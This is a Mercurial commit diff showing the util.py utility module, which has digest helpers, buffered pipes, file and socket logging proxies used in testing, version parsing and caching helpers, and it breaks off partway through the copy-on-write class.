util: set correct stack level on deprecation warnings...
Martin von Zweigbergk
r37693:5b8a2607 default
@@ -1,3863 +1,3863 b''
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import tempfile
import time
import traceback
import warnings
import zlib

from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    dateutil,
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def _rapply(f, xs):
    if xs is None:
        # assume None means non-value of optional data
        return xs
    if isinstance(xs, (list, set, tuple)):
        return type(xs)(_rapply(f, x) for x in xs)
    if isinstance(xs, dict):
        return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
    return f(xs)

def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2
        return xs
    return _rapply(f, xs)

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

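# Illustrative sketch (hypothetical helper, not part of the original
# module): bitsfrom() ORs an iterable of flags into a single bitmask,
# e.g. to fold stat permission bits into one mode value.
def _bitsfromexample():
    mask = bitsfrom([stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR])
    assert mask == stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
    return mask
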
# Python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to the standard user, so detect if we are running
# tests and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our use case.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning.

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

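# Illustrative sketch (hypothetical helper, not part of the original
# module): 'stacklevel' selects the frame a warning is attributed to.
# nouideprecwarn() adds one so that the frame it introduces is skipped and
# the warning points at its caller rather than at util.py itself.
def _stacklevelexample():
    def deprecatedhelper(stacklevel=1):
        # the +1 skips deprecatedhelper's own frame, mirroring the
        # stacklevel + 1 in nouideprecwarn() above
        warnings.warn(r'old API', DeprecationWarning,
                      stacklevel=stacklevel + 1)
    with warnings.catch_warnings(record=True) as log:
        warnings.simplefilter(r'always')
        deprecatedhelper()  # the warning is attributed to this line
    return log
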
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

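# Illustrative sketch (hypothetical helper, not part of the original
# module): digestchecker wraps a file handle so content is hashed as it
# streams past, then size and digests are checked in one go at the end.
def _digestcheckerexample(fh, size, sha1hex):
    checker = digestchecker(fh, size, {'sha1': sha1hex})
    while checker.read(4096):
        pass
    checker.validate()  # raises error.Abort on size or digest mismatch
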
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

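# Illustrative sketch (hypothetical helper, not part of the original
# module): on Python 3 the buffer() shim above slices a memoryview,
# yielding a zero-copy window where plain slicing would copy the bytes.
def _bufferexample():
    data = b'0123456789'
    view = buffer(data, 4, 3)
    assert bytes(view) == b'456'
    return view
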
_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

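# Illustrative sketch (hypothetical helper, POSIX-only, not part of the
# original module): once data has been pulled into a user-space buffer,
# select() on the fd reports nothing, so a poll loop has to consult
# hasbuffer before waiting on the descriptor.
def _hasbufferexample():
    import select
    rfd, wfd = os.pipe()
    os.write(wfd, b'one\ntwo\n')
    pipe = bufferedinputpipe(os.fdopen(rfd, r'rb'))
    assert pipe.readline() == b'one\n'
    # b'two\n' now sits in the pipe's buffer; the kernel pipe is empty,
    # so select() sees nothing even though a read would succeed
    assert select.select([pipe.fileno()], [], [], 0)[0] == []
    assert pipe.hasbuffer
    os.close(wfd)
    return pipe.readline()
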
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

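# Illustrative sketch (hypothetical helper, not part of the original
# module): mmapread() maps a file read-only; mmap.mmap() raises
# ValueError for zero-length files, hence the empty-buffer fallback above.
def _mmapreadexample():
    with tempfile.TemporaryFile() as fp:
        fp.write(b'mapped bytes')
        fp.flush()
        buf = mmapread(fp)
        assert buf[:6] == b'mapped'
        return len(buf)
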
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

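# Illustrative sketch (hypothetical class, not part of the original
# module): the proxy above works by routing every access to its own state
# through object.__getattribute__, so its __getattribute__ override never
# recurses into itself while everything else is delegated to the target.
class _minimalproxy(object):
    __slots__ = (r'_orig', r'_log')

    def __init__(self, orig):
        object.__setattr__(self, r'_orig', orig)
        object.__setattr__(self, r'_log', [])

    def __getattribute__(self, name):
        if name in (r'read', r'_log'):
            # intercepted: handled by us so the call can be observed
            return object.__getattribute__(self, name)
        # everything else passes straight through to the wrapped object
        return getattr(object.__getattribute__(self, r'_orig'), name)

    def read(self, size=-1):
        res = object.__getattribute__(self, r'_orig').read(size)
        object.__getattribute__(self, r'_log').append((r'read', size))
        return res
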
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

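# Illustrative sketch (hypothetical helper, not part of the original
# module): wiring the observer and proxy together. With the defaults
# (logdataapis=True, logdata=False) each proxied call becomes one log
# line, e.g. "dest> write(5) -> 5".
def _loggingfileobjectexample():
    log = stringio()
    fh = makeloggingfileobject(log, stringio(), b'dest')
    fh.write(b'hello')
    fh.flush()
    return log.getvalue()
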
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # send() returns the number of bytes written as an integer.
        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))
979
979
980 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
980 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
981 logdata=False, logdataapis=True):
981 logdata=False, logdataapis=True):
982 """Turn a socket into a logging socket."""
982 """Turn a socket into a logging socket."""
983
983
984 observer = socketobserver(logh, name, reads=reads, writes=writes,
984 observer = socketobserver(logh, name, reads=reads, writes=writes,
985 states=states, logdata=logdata,
985 states=states, logdata=logdata,
986 logdataapis=logdataapis)
986 logdataapis=logdataapis)
987 return socketproxy(fh, observer)
987 return socketproxy(fh, observer)
988
988
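# Illustrative use of makeloggingsocket (a sketch; ``logfh`` and the wrapped
# socket are hypothetical, not names defined in this module):
#
#   logfh = open('/tmp/wire.log', 'wb')
#   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   sock = makeloggingsocket(logfh, sock, 'client')
#   # send()/recv() traffic on ``sock`` is now mirrored into wire.log
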
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    parts = remod.split(br'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

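# Illustrative usage of cachefunc (a sketch; ``square`` is a throwaway
# example function):
#
#   >>> calls = []
#   >>> def square(x):
#   ...     calls.append(x)
#   ...     return x * x
#   >>> square = cachefunc(square)
#   >>> square(3), square(3)
#   (9, 9)
#   >>> calls  # the wrapped function only ran once
#   [3]
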
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
